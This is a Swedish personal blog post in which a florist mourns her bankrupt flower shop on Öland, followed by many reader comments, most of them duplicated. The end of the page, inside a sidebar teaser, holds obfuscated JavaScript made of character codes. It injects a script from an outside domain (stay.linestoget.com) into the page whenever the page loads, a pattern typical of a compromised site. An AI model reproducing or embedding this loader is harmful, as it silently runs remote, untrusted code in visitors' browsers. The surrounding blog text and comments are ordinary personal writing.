Slagfält deluxe! Tillbaka i butiken…..

image

Godmorgon! ”Måndag, ny vecka… nya möjligheter ” Det är vad jag försöker säga till mig själv.

Då var jag tillbaka på Öland igen, efter några dagar iTimmernabben.  Usch, detta känns som en lång utdragen skilsmässa! Jag VET att jag ser ut som ett vrak! Men just nu finns det ingen ork till att sminka mig, eller göra mig iordning! Jag har ingen lust helt enkelt! Jag har inte tvättat håret på en och en halv vecka. Ganska äckligt faktiskt. Men inte ens det orkar Jag bry mig om! 

Jag sa ”hej då” till butiken för ett par dagar sedan! Skrek, grät, och hulkade av förtvivlan. Nu är jag tillbaka här igen. Behövde bifoga en inventeringslista och hämta några pärmar till.

Det känns ungefär som att slita av ett plåster och häll salt rakt i ett öppet, irriterat sår!!!!!!!! Det gör så j*vla ont! Känslorna är ett kaos i kroppen och jag bryter ihop igen! Mitt florist hjärta blöder! Jag saknar mina tjejer, Evelina & Vickan <3 JÄTTE MYCKET!

Butiken ser ut som ett slagfält! Som en plats Gud glömde!?! Jag vill springa in, vattna, vårda och ta hand om mina växter/plantor. Dom ligger huller om buller, dom kämpar för sina liv, torkan och behovet av vatten gör att dom blivit så ”lätta” att dom inte har en chans mot vinden när den hugger tag! Så sorgligt. Så mycket liv om bara får till spillo. Thujor, syrener, klematis, vindruvor, tomater, örter, salix, körsbärsträd, kryddor, rosor, agapantus, kiwi, och en massa annat som bara kommer att dö.

Jag förstår  om du inte förstår mina känslor kring växterna. Men jag ÄR och kommer ALLTID vara en blomsternörd! Med eller utan butik, DET kan ingen konkurs i världen ta ifrån mig! 

Kunder, mailar och kommentar och frågar mig om dom inte kan få köp det sista…. -Nej, tyvärr, Jag är ledsen! Ingenting tillhör längre mig.

Jag FÅR inte sälja någonting! Hur gärna jag än skulle vilja GE bort växterna för att rädda livet på dom så får jag inte ens göra det! Jag FÅR inte vattna, vårda och sköta växterna…. jag känner mig bakbunden och maktlös!

Allting tillhör konkursboet och konkursförvaltaren. JAG tillhör tillsvidare också konkursförvaltare. Jag måste stå standby och invänta nästa steg. Vad det är vet jag fortfarande inte.

Jag hoppas INNERLIGT att jag slipper att öppna upp butiken igen för en sista utförsäljning! Jag ber till Gud att jag ska slippa det! Det skulle vara fruktansvärt!

Usch nu gråter jag igen! Jag gråter av frustration, sorg och över ovissheten. Jag bestämde mig imorse för att jag  INTE skulle gråta idag! Dig skulle vara en bra dag. ÄNTLIGEN  ska jag få hem min älskade Lilleman och min vovve Tezz. Idag ska familjen samla och vi ska åka hem. Hem till Sigtuna. Det skrämmer mig att komma hem. VAD ska jag göra då?! Usch, nu kommer verkligheten ifatt……imageimageimageimageimage imageMen det får vara så. Just nu, en timme i taget. Sen en dag i taget……. Tack för din omtanke! Dina kommentarer och ditt stöd är GULD värt! 

imageKanske är det sista gången jag är i butiken….. Kanske inte! Ovissheten driver mig till vansinne!

Jag vill få ett avslut nu. Få landa, krascha och börja om igen. Sörja, bearbeta och hitta styrkan! Hitta styrkan att resa mig upp igen……….

-Det är min högsta önskan just nu <3 image

Nu har jag möte någon timme innan jag ska hämta Lilleman… Sen kör vi norrut!

Kramar / MyMartens 

89 Komentarer

 1. Jag förstår dig My!
  Blommor och växter är levande!
  Alla vi som har ”gröna fingrar” och kanske som jag har gjort, jobbat i blomsteraffär förstår att det gör ont att se dem torka och inte få omsorg.
  Tror inte alla förstår vilket slit det faktiskt är att jobba med blommor!
  Det är ju knappast att bara binda vackra buketter. Det är jord under naglar, blad i håret, sår efter vassa rosentaggar, märken i fingrar efter att ha snittat, vattnade, släpande, sopande m.m m.m och alldeles alldeles underbart! De olika säsongerna. Julen och julgrupper som gör att man ser hyaccinter och band framför sig när man blundar på kvällen när man ska sova ?
  Jag förstår din sorg!
  Vill också säga att din blogg de senaste turbulenta veckorna har fått mig att börja gilla dig mycket!
  Känns som att man har fått lära känna en helt äkta och härlig människa.
  Kanske låter konstigt men du har under dessa jobbiga (för dig) veckor vuxit i mina ögon.
  Det kommer bli bra igen.
  Och du är ung! Vi är många som haft flera år på oss att lära oss av misstag och få lugn, ro och ett harmoniskt liv idag.
  Kram!

 2. Kan inget annat än ge dig en stor cyberkram! Du fixar detta oxå! Fy fasen va du e stark… det är nu din kropp är som starkast. Även om du inte känner så. ❤

 3. Men vad tråkigt att se dina växter bara torka ihjäl. Varför kan du inte få ge bort dom istället ? De går ju inte att sälja nu ändå. Konstiga regler.
  Skulle gärna ge dig en kram och lite mänsklig värme om det bara inte var så långt för mig att åka.
  Hoppas det löser sig för dig snart och du kan gå vidare.
  Lycka till. Hälsningar Skåne.

 4. Men kära nån en sådan sorglig syn. Hur kan så många fina växter bara få dö??? Ska inte konkursförvaltaren just förvalta? Snyft.
  /en annan blomsternörd

 5. Förstår din sorg! Det måste vara hemskt att se sitt livsverk slås till spillror. Men det kommer andra tider My. En dag i taget… Fokusera på Lilleman, hitta styrka i honom och din hund. En dag i taget… Vi är många som högaktar dig! Kram ❤️

 6. Hej finaste My.
  Du kommer att klara dig igenom detta. Och du kommer att hitta lyckan igen. På alla alla sätt.
  Ta lite tid för dig själv och sonen.
  Du är grym. Och du är du. All kärlek.
  Maia

 7. Vad är det som hänt mellan dig, Graaf systrarna och alla andra som du umgåtts med i Sigtuna? Finns ingen där för dig nu? Känns som du helt plötsligt är väldigt ensam. Men du fixar detta, du är stark! Kramar till dig!

  • Det undrar jag med. Madde illmerud också har ju tagit avstånd vad jag förstår….VAD kan vara så hemskt att alla klipper bort en ur ens liv? Och alla? Inte bara en…tycker synd om dig. Men du är stark och hittar nya riktiga vänner som står där. Oavsett

    • Upplever det som lite märkligt att ingen av systrarna har kommenterat ditt mående eller gett något uttryck för stöd (i sina bloggar, vad som händer annars har jag givetvis ingen aning om!) under den tid du mått dåligt. Med tanke på att ni nästan dagligen skrev om varandra och umgicks med samma folk, på samma fester osv. så tycker jag bara att det är konstigt. Därav min fråga.

     • Exakt. Och att Maggan tidigare la ut en karmabild…då lägger man ju själv ved på elden. Varför inte försöka reda ut istället? Och illmerud skrev ett svagt svar om att hon pratat med My…men inte tog ställning. Jämför det med hennes brandtal för Mirka och hennes situation…. Nåt är det men det verkar vara locket på. Synd om My bra tycker jag…..skulle inte vilja ha såna vänner.

    • Vi läsare kan ju bara läsa det ni skriver och bilda oss en uppfattning om era liv utifrån det.
     Jag har ju skrivit tidigare att Ilmrud skrev hon tog avstånd, varken du eller Maggan skriver om varandra osv. Klart att vi läsare undrar vad som händer! En del personer kan man nog gärna vara utan dock, utan att nämna några namn;)
     Verkar vara så mycket intriger, bråk o konstigheter mellan bloggare nu för tiden!

     • Något måste ha hänt. Även om bloggväninnor ger stöd ”privat” o inte på bloggen el Insta borde de ju skriva nåt litet hjärta el nåt… El så är det show för oss nyfikna kärringar…

 8. Tragiskt att växterna inte tas eller ens får tas omhand… Det ligger ju pengar i dem så märkligt är det. Så sorgligt för dig att se allt förfallet och ödsligt tomt när det varit ditt skötebarn och blomstrande företag. Förstår din sorg och att du inte orkar mer än det du måste just nu. Hoppas du kan landa med Lilleman hemma och få slappna av och bara vara så mycket det nu är möjligt. Som någon klok har skrivit hos dig: kom ihåg att du inte ÄR konkursen – du är samma goa, kloka, mysiga och företagsamma person ändå. Nu är tid att ta sig igenom detta – en dag i taget och emellanåt kanske bara 5 minuter i taget men igenom kommer du för sånt är livet – det härdar oss! Varm kram <3

 9. Jag förstår dig My!
  Blommor och växter är levande!
  Alla vi som har ”gröna fingrar” och kanske som jag har gjort, jobbat i blomsteraffär förstår att det gör ont att se dem torka och inte få omsorg.

  Tror inte alla förstår vilket slit det faktiskt är att jobba med blommor!

  Det är ju knappast att bara binda vackra buketter. Det är jord under naglar, blad i håret, sår efter vassa rosentaggar, märken i fingrar efter att ha snittat, vattnade, släpande, sopande m.m m.m och alldeles alldeles underbart! De olika säsongerna. Julen och julgrupper som gör att man ser hyaccinter och band framför sig när man blundar på kvällen när man ska sova 🙂

  Jag förstår din sorg!
  Vill också säga att din blogg de senaste turbulenta veckorna har fått mig att börja gilla dig mycket!

  Känns som att man har fått lära känna en helt äkta och härlig människa.
  Kanske låter konstigt men du har under dessa jobbiga (för dig) veckor vuxit i mina ögon.

  Det kommer bli bra igen.
  Och du är ung! Vi är många som haft flera år på oss att lära oss av misstag och få lugn, ro och ett harmoniskt liv idag.

  Kram!

 10. Kan inget annat än ge dig en stor cyberkram! Du fixar detta oxå! Fy fasen va du e stark… det är nu din kropp är som starkast. Även om du inte känner så. ❤

 11. Men vad tråkigt att se dina växter bara torka ihjäl. Varför kan du inte få ge bort dom istället ? De går ju inte att sälja nu ändå. Konstiga regler.
  Skulle gärna ge dig en kram och lite mänsklig värme om det bara inte var så långt för mig att åka.
  Hoppas det löser sig för dig snart och du kan gå vidare.
  Lycka till. Hälsningar Skåne.

 12. Men kära nån en sådan sorglig syn. Hur kan så många fina växter bara få dö??? Ska inte konkursförvaltaren just förvalta? Snyft.

  /en annan blomsternörd

 13. Vad tragiskt med dom fina växterna. Vet du My, jag tycker trots din sorg och efter all gråten så är du så fin. Strunta i fransförlängning. Det ser så onaturligt ut och du är ett naturbarn så vacker.

 14. Det är fasen skandal att allt bara får förfalla. Det måste väl vara bättre att någon sköter om växterna till en eventuell utförsäljning.

 15. Förstår din sorg! Det måste vara hemskt att se sitt livsverk slås till spillror. Men det kommer andra tider My. En dag i taget… Fokusera på Lilleman, hitta styrka i honom och din hund. En dag i taget… Vi är många som högaktar dig! Kram ❤️

 16. Hej finaste My.
  Du kommer att klara dig igenom detta. Och du kommer att hitta lyckan igen. På alla alla sätt.
  Ta lite tid för dig själv och sonen.
  Du är grym. Och du är du. All kärlek.
  Maia

 17. Vad är det som hänt mellan dig, Graaf systrarna och alla andra som du umgåtts med i Sigtuna? Finns ingen där för dig nu? Känns som du helt plötsligt är väldigt ensam. Men du fixar detta, du är stark! Kramar till dig!

  • Det undrar jag med. Madde illmerud också har ju tagit avstånd vad jag förstår….VAD kan vara så hemskt att alla klipper bort en ur ens liv? Och alla? Inte bara en…tycker synd om dig. Men du är stark och hittar nya riktiga vänner som står där. Oavsett

    • Upplever det som lite märkligt att ingen av systrarna har kommenterat ditt mående eller gett något uttryck för stöd (i sina bloggar, vad som händer annars har jag givetvis ingen aning om!) under den tid du mått dåligt. Med tanke på att ni nästan dagligen skrev om varandra och umgicks med samma folk, på samma fester osv. så tycker jag bara att det är konstigt. Därav min fråga.

     • Exakt. Och att Maggan tidigare la ut en karmabild…då lägger man ju själv ved på elden. Varför inte försöka reda ut istället? Och illmerud skrev ett svagt svar om att hon pratat med My…men inte tog ställning. Jämför det med hennes brandtal för Mirka och hennes situation…. Nåt är det men det verkar vara locket på. Synd om My bra tycker jag…..skulle inte vilja ha såna vänner.

    • Vi läsare kan ju bara läsa det ni skriver och bilda oss en uppfattning om era liv utifrån det.
     Jag har ju skrivit tidigare att Ilmrud skrev hon tog avstånd, varken du eller Maggan skriver om varandra osv. Klart att vi läsare undrar vad som händer! En del personer kan man nog gärna vara utan dock, utan att nämna några namn;)
     Verkar vara så mycket intriger, bråk o konstigheter mellan bloggare nu för tiden!

     • Något måste ha hänt. Även om bloggväninnor ger stöd ”privat” o inte på bloggen el Insta borde de ju skriva nåt litet hjärta el nåt… El så är det show för oss nyfikna kärringar…

 18. Tragiskt att växterna inte tas eller ens får tas omhand… Det ligger ju pengar i dem så märkligt är det. Så sorgligt för dig att se allt förfallet och ödsligt tomt när det varit ditt skötebarn och blomstrande företag. Förstår din sorg och att du inte orkar mer än det du måste just nu. Hoppas du kan landa med Lilleman hemma och få slappna av och bara vara så mycket det nu är möjligt. Som någon klok har skrivit hos dig: kom ihåg att du inte ÄR konkursen – du är samma goa, kloka, mysiga och företagsamma person ändå. Nu är tid att ta sig igenom detta – en dag i taget och emellanåt kanske bara 5 minuter i taget men igenom kommer du för sånt är livet – det härdar oss! Varm kram <3

  • Brukar väl vara konkursförvaltare som säljer ut det sista om det behövs för att få in mer pengar till konkursboet. Men hon har ju skrivit att det är inga skulder i bolaget så då blir det väl hennes fd som får med detta ”på köpet” när konkursförvaltaren avslutat. Tror inte hon behöver stå där själv. VAD ska Lillemans pappa göra av det tro ?

 19. Fyy, va tråkigt med alla fina växter… Men du kommer fixa det här My, för du är stark! Skickar massor med kramar till dig <3

 20. Vad tragiskt med dom fina växterna. Vet du My, jag tycker trots din sorg och efter all gråten så är du så fin. Strunta i fransförlängning. Det ser så onaturligt ut och du är ett naturbarn så vacker.

 21. Det är fasen skandal att allt bara får förfalla. Det måste väl vara bättre att någon sköter om växterna till en eventuell utförsäljning.

 22. Usch vad tragiskt o hemskt det ser ut. Som du skriver, rena slagfältet ! Nåt som jag inte förstår, är att ev ska du få besked om det ska bli utförsäljning i affären, så mycket i så fall som går till spillo när inte växterna inte ens får vatten. Kram

 23. Tillåt dig att gråta hur mycket som helst…jag ser det som en del av en bearbetning när man går igenom tunga saker..
  Kommer gå stark ur detta..el ännu starkare rättar sagt..
  Tufft å hemskt när man är mitt i något….
  Vi är många som tänker på dig ❤

  • Brukar väl vara konkursförvaltare som säljer ut det sista om det behövs för att få in mer pengar till konkursboet. Men hon har ju skrivit att det är inga skulder i bolaget så då blir det väl hennes fd som får med detta ”på köpet” när konkursförvaltaren avslutat. Tror inte hon behöver stå där själv. VAD ska Lillemans pappa göra av det tro ?

 24. Fyy, va tråkigt med alla fina växter… Men du kommer fixa det här My, för du är stark! Skickar massor med kramar till dig <3

 25. Fy vilken behandling av blommorna.
  Är inte blomsternörd men det där är ju ren kapitalförstöring. Pengar som kunde gått in i konkursboet :/
  Massor med kramar till dig My

 26. Usch vad tragiskt o hemskt det ser ut. Som du skriver, rena slagfältet ! Nåt som jag inte förstår, är att ev ska du få besked om det ska bli utförsäljning i affären, så mycket i så fall som går till spillo när inte växterna inte ens får vatten. Kram

 27. Tillåt dig att gråta hur mycket som helst…jag ser det som en del av en bearbetning när man går igenom tunga saker..
  Kommer gå stark ur detta..el ännu starkare rättar sagt..
  Tufft å hemskt när man är mitt i något….
  Vi är många som tänker på dig ❤

 28. Hej. Märkligt att inte konkursförvaltaren tar in någon utav dina fd anställda några timmar per vecka för att vattna och sköta om blommorna med det mest akuta så de överlever och mår bra fram tills det är bestämt om det ska bli konkursutförsäljning på allt det som finns kvar i butiken eller om det ska bli anbudsförsäljning som då omfattar hela affärsrörelsen dvs alla inventarier, blommor, krukor, jord och dyl dvs allt som finns, kundregister, personal som var anställda per den dagen konkursen inleddes, det sista alternativet är annars att konkursförvaltaren anser att det inte finns något högre värde i det som finns kvar och att det då skulle bli en för hög kostnad för konkursboet gentemot vad intäkterna ifrån utförsäljningen skulle kunna bli dvs osäkert om det ens blir någon vinst alls utan förlust istället eftersom konkursförvaltaren då måste ta in personal och konkursboet blir betalningsansvariga för lön, skatt, pension, semesterlön och sociala avgifter för den tiden som personalen jobbar med utförsäljningen. Då personalen har statlig lönegaranti så är de under den tiden även skyldiga att hjälpa till och därmed stå till konkursförvaltaren förfogande. Vet inte helt hur det är med rättigheter och skyldigheter för den fd anställde ägaren och anställde vdn, brukar tyvärr vara lite andra regler som gäller för dom, tex inte säkert att man som fd anställd ägare/anställd vd får vara i butiken och hjälpa till vid en konkursutförsäljning eller ens få vara nåt mer överhuvudtaget i butiken efter det att konkurs är inledd.
  Skönt för er alla att få åka hem till Sigtuna en stund och komma bort ifrån allt nere på Öland. Passa på att träffa vänner och umgås mycket nu så ni kan återhämta er och få nya stärkande krafter.
  Lycka till och stå på dig, du är starkare och klarar av mer än vad du tror!

  • Håller fullständigt med. Fint och klokt skrivet.
   Allt levande måste alltid skötas, dessutom har det ett värde i sig.

 29. Fy vilken behandling av blommorna.
  Är inte blomsternörd men det där är ju ren kapitalförstöring. Pengar som kunde gått in i konkursboet :/

  Massor med kramar till dig My

 30. Hej. Märkligt att inte konkursförvaltaren tar in någon utav dina fd anställda några timmar per vecka för att vattna och sköta om blommorna med det mest akuta så de överlever och mår bra fram tills det är bestämt om det ska bli konkursutförsäljning på allt det som finns kvar i butiken eller om det ska bli anbudsförsäljning som då omfattar hela affärsrörelsen dvs alla inventarier, blommor, krukor, jord och dyl dvs allt som finns, kundregister, personal som var anställda per den dagen konkursen inleddes, det sista alternativet är annars att konkursförvaltaren anser att det inte finns något högre värde i det som finns kvar och att det då skulle bli en för hög kostnad för konkursboet gentemot vad intäkterna ifrån utförsäljningen skulle kunna bli dvs osäkert om det ens blir någon vinst alls utan förlust istället eftersom konkursförvaltaren då måste ta in personal och konkursboet blir betalningsansvariga för lön, skatt, pension, semesterlön och sociala avgifter för den tiden som personalen jobbar med utförsäljningen. Då personalen har statlig lönegaranti så är de under den tiden även skyldiga att hjälpa till och därmed stå till konkursförvaltaren förfogande. Vet inte helt hur det är med rättigheter och skyldigheter för den fd anställde ägaren och anställde vdn, brukar tyvärr vara lite andra regler som gäller för dom, tex inte säkert att man som fd anställd ägare/anställd vd får vara i butiken och hjälpa till vid en konkursutförsäljning eller ens få vara nåt mer överhuvudtaget i butiken efter det att konkurs är inledd.

  Skönt för er alla att få åka hem till Sigtuna en stund och komma bort ifrån allt nere på Öland. Passa på att träffa vänner och umgås mycket nu så ni kan återhämta er och få nya stärkande krafter.

  Lycka till och stå på dig, du är starkare och klarar av mer än vad du tror!

 31. My, Jag förstår precis hur du känner när du kommer dit!
  Men hur kommer det sig att alla växter ligger huller om buller bara?
  Och varför får man inte resa dom och vattna???
  Det borde ju ligga i allas intresse att blommorna och alla andra växter mår väl och kan säljas?
  Det är ju mycket pengar i det!
  Stackars dej som tvingas dit och inte får göra någonting……
  Kan du smyga dit på kvällen/natten och resa dom å vattna utan att dom får reda på det?
  Ååhhhhh, Jag lider med dig…….
  Men allt ordnar sig tillslut.

 32. Kan dom inte skynda på? Växterna behöver ju vatten ? så himla synd att förstöra så många fina växter.. Håller tummarna att du slipper utförsäljning! Kram ?

 33. Det är sorgligt att se hur växterna bara dör bort för att ni inte får sköta om dem. Som någon skrev så skulle det vara bättre om någon av er ansvarade gör dem tills dess att det finns ett beslut om det blir en utförsäljning el inte. Judt nu är det bara kapitalförstöring i min mening. Det är så konstiga regler som man inte förstår. Kram o kör försiktigt mot Sigtuna.

 34. My, Jag förstår precis hur du känner när du kommer dit!
  Men hur kommer det sig att alla växter ligger huller om buller bara?
  Och varför får man inte resa dom och vattna???
  Det borde ju ligga i allas intresse att blommorna och alla andra växter mår väl och kan säljas?
  Det är ju mycket pengar i det!
  Stackars dej som tvingas dit och inte får göra någonting……
  Kan du smyga dit på kvällen/natten och resa dom å vattna utan att dom får reda på det?
  Ååhhhhh, Jag lider med dig…….
  Men allt ordnar sig tillslut.

 35. Kan dom inte skynda på? Växterna behöver ju vatten 🙁 så himla synd att förstöra så många fina växter.. Håller tummarna att du slipper utförsäljning! Kram 😉

 36. Hej fina vackra My!
  Såg precis att din underbara butik har lagt ner ? Så himla synd, speciellt när du har lagt så mycket tid, energi, pengar och kärlek på stället. 10 år är en väldigt lång tid – speciellt när man är så ung som du (och vi) är! Jag är själv företagare, har enskild firma och driver en liten inredningsbutik i Kalmar. Men jag är så imponerad av dig! Du har lyckats med något som de flesta företagare aldrig kommer att uppleva. Sen hinner livet ikapp en och du verkar vara en känslomänniska, precis som jag (hej hsp!) och då måste man faktiskt prioritera familjen, sig själv och hälsan! Det är ändå det viktigaste av allt – vilket företag man än har!
  Och jag följer dig på Instagram och ser hur bra det går för dig! Jag tänker att kanske var Mys blommor något som passade i ditt förra liv och nu så ska du satsa stenhårt på träningen och bloggen? Ett friare liv där du kan resa, skriva, fota och träna! Du är framgångsrik och proffsig – och det bästa man kan göra är att följa livet och ta alla tillfällen som ges (läs the secret om du inte redan gjort det!) för att man ska nå de målen som man vill uppfylla i sitt liv. Det är dags att säga hej då till det förflutna och satsa på ditt nya jobb, det du tjänar pengar på och där du kan känna dig genuint glad och fri.
  Du undrar vem du är utan Mys blommor. Jag skulle säga att du är SÅ MYCKET MER än Mys blommor! Du är MY! Tuff brud i snygg förpackning som kan lägga all sin tid på sin son och ett annat jobb som frilansande träningsproffs och bloggare. Kolla in Lofsans, Olga och andra PT:s som lever gott på att inspirera andra inom träning.
  Det var nog allt för denna pepptalkande mamma ? Jag bor i Kalmar om du vill ta en fika någon gång. All styrka och stora varma kramar till dig över sundet!
  Kram
  Madeleine

 37. Det är sorgligt att se hur växterna bara dör bort för att ni inte får sköta om dem. Som någon skrev så skulle det vara bättre om någon av er ansvarade gör dem tills dess att det finns ett beslut om det blir en utförsäljning el inte. Judt nu är det bara kapitalförstöring i min mening. Det är så konstiga regler som man inte förstår. Kram o kör försiktigt mot Sigtuna.

 38. Hej fina vackra My!

  Såg precis att din underbara butik har lagt ner 🙁 Så himla synd, speciellt när du har lagt så mycket tid, energi, pengar och kärlek på stället. 10 år är en väldigt lång tid – speciellt när man är så ung som du (och vi) är! Jag är själv företagare, har enskild firma och driver en liten inredningsbutik i Kalmar. Men jag är så imponerad av dig! Du har lyckats med något som de flesta företagare aldrig kommer att uppleva. Sen hinner livet ikapp en och du verkar vara en känslomänniska, precis som jag (hej hsp!) och då måste man faktiskt prioritera familjen, sig själv och hälsan! Det är ändå det viktigaste av allt – vilket företag man än har!

  Och jag följer dig på Instagram och ser hur bra det går för dig! Jag tänker att kanske var Mys blommor något som passade i ditt förra liv och nu så ska du satsa stenhårt på träningen och bloggen? Ett friare liv där du kan resa, skriva, fota och träna! Du är framgångsrik och proffsig – och det bästa man kan göra är att följa livet och ta alla tillfällen som ges (läs the secret om du inte redan gjort det!) för att man ska nå de målen som man vill uppfylla i sitt liv. Det är dags att säga hej då till det förflutna och satsa på ditt nya jobb, det du tjänar pengar på och där du kan känna dig genuint glad och fri.

  Du undrar vem du är utan Mys blommor. Jag skulle säga att du är SÅ MYCKET MER än Mys blommor! Du är MY! Tuff brud i snygg förpackning som kan lägga all sin tid på sin son och ett annat jobb som frilansande träningsproffs och bloggare. Kolla in Lofsans, Olga och andra PT:s som lever gott på att inspirera andra inom träning.

  Det var nog allt för denna pepptalkande mamma 🙂 Jag bor i Kalmar om du vill ta en fika någon gång. All styrka och stora varma kramar till dig över sundet!

  Kram
  Madeleine

 39. Håller med en föregående talare, du är så mycket mer. Att du förlorat ditt livsverk är ju naturligtvis en sorg, och måste ju få ta den tid som behövs , precis som all annan sorg. Du kommer att komma ut på andra sidan med ny glöd, det är tåga i dig. Stor kram på dig.

 40. Jag är också företagare, det har gått spikrakt uppåt som neråt och man tappar greppet. Inte bara om sitt egna företag utan även från omgivningen som kan vara väldigt elaka utan förståelse. Men jag är på väg tbx, det har kostat mig svett & tårar, stress och ångest….för jag tror på mig själv och har en dröm att förverkliga!
  Du är 28 år och entreprenör hela 40 år kvar som yrkesarbetande. I all bedrövelse borde DU klappa dig själv på axeln och gratulera dig själv för vilken fantastiskt resa du har gjort…..Hur många i din ålder har varit egna företagare i 10 år?! Du är grym och du har lärt dig så mycket av detta. Du är snart tillbaka och det ska bli roligt att följa dig och ditt entreprenörskaps. Hoppas att du mår bättre inom kort. All lycka till dig/Tina

 41. Håller med en föregående talare, du är så mycket mer. Att du förlorat ditt livsverk är ju naturligtvis en sorg, och måste ju få ta den tid som behövs , precis som all annan sorg. Du kommer att komma ut på andra sidan med ny glöd, det är tåga i dig. Stor kram på dig.

 42. Jag är också företagare, det har gått spikrakt uppåt som neråt och man tappar greppet. Inte bara om sitt egna företag utan även från omgivningen som kan vara väldigt elaka utan förståelse. Men jag är på väg tbx, det har kostat mig svett & tårar, stress och ångest….för jag tror på mig själv och har en dröm att förverkliga!
  Du är 28 år och entreprenör hela 40 år kvar som yrkesarbetande. I all bedrövelse borde DU klappa dig själv på axeln och gratulera dig själv för vilken fantastiskt resa du har gjort…..Hur många i din ålder har varit egna företagare i 10 år?! Du är grym och du har lärt dig så mycket av detta. Du är snart tillbaka och det ska bli roligt att följa dig och ditt entreprenörskaps. Hoppas att du mår bättre inom kort. All lycka till dig/Tina

 43. Men varför svarar du inte på frågorna dina läsare skriver. Systrarna Graaf skriver ju inte ett ord om dig längre. Du måste ju ha sårat o gjort något hemskt mot dessa underbara tjejer. Så kom igen nu ge dina läsare ett svar. Vänner ska man vara otroligt snäll emot. Tror att detta gnager sönder dig snart

 44. Men varför svarar du inte på frågorna dina läsare skriver. Systrarna Graaf skriver ju inte ett ord om dig längre. Du måste ju ha sårat o gjort något hemskt mot dessa underbara tjejer. Så kom igen nu ge dina läsare ett svar. Vänner ska man vara otroligt snäll emot. Tror att detta gnager sönder dig snart

 45. Vilka extremt konstiga spekulationer om dina relationer med andra personer. Som om du vore skyldiga dom ett svar. Som om allt finns i bloggen. Var kommer dessa människor ifrån och var skaffar dom sig sina rättigheter?
  Måste ändå säga att när jag såg bilden på dig innan jag läste ditt inlägg så reagerade jag på hur fin du såg ut och hur vacker du är osminkad. Du ska inte vara så kritisk mot dig själv utan snällare. Du är en fin person och vacker. Glöm inte det.

 46. Vilka extremt konstiga spekulationer om dina relationer med andra personer. Som om du vore skyldiga dom ett svar. Som om allt finns i bloggen. Var kommer dessa människor ifrån och var skaffar dom sig sina rättigheter?

  Måste ändå säga att när jag såg bilden på dig innan jag läste ditt inlägg så reagerade jag på hur fin du såg ut och hur vacker du är osminkad. Du ska inte vara så kritisk mot dig själv utan snällare. Du är en fin person och vacker. Glöm inte det.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/